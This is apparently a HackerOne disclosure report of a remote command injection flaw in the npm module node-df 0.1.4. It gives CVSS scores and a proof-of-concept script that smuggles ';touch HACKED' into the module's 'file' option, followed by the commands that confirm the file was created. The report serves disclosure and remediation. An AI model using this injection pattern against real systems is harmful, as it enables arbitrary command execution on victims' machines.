Node.js third-party modules: [node-df] RCE via insecure command concatenation

HackerOne report H1:703412, reported by mik317 (hackerone.com)
2019-09-28 09:11:41

CVSS3: 9.8 High
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2: 7.5 High
  Access Vector: NETWORK
  Access Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: PARTIAL
  Availability Impact: PARTIAL
  Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS: 0.004 Low
  Percentile: 69.9%

I would like to report an RCE issue in the node-df module.
It allows an attacker to execute arbitrary commands remotely on the victim's machine.

Module

module name: node-df
version: 0.1.4
npm page: https://www.npmjs.com/package/node-df

Module Description

> node-df (abbreviation of disk free) is a cross-platform Node.js wrapper around the standard Unix computer program, df.

Module Stats

[N/A] downloads in the last day
[3,023] downloads in the last week
[N/A] downloads in the last month

Vulnerability Description

The issue occurs because user input is concatenated into a shell command string that is then executed without any validation or escaping. The issue arises here:

Steps To Reproduce:

  1. Create the following PoC file:

    // poc.js
    var df = require('node-df');
    var options = {
        // user-controlled value that node-df concatenates into the df command line
        file: '/;touch HACKED',
        prefixMultiplier: 'GB',
        isDisplayPrefixMultiplier: true,
        precision: 2
    };

    df(options, function (error, response) {
        if (error) { throw error; }

        console.log(JSON.stringify(response, null, 2));
    });

  2. Execute the following commands in terminal:

    npm i node-df  # Install affected module
    ls             # Make sure there isn't any HACKED file yet
    node poc.js    # Run the PoC
    ls             # The HACKED file has been created

  3. The HACKED file will be created {F594172}

Patch

> Don't concatenate commands using untrusted user input :)

Supporting Material/References:

  • [OPERATING SYSTEM VERSION]: Kali Linux

Wrap up

  • I contacted the maintainer to let them know: [N]
  • I opened an issue in the related repository: [N]

Impact

RCE on node-df via insecure command concatenation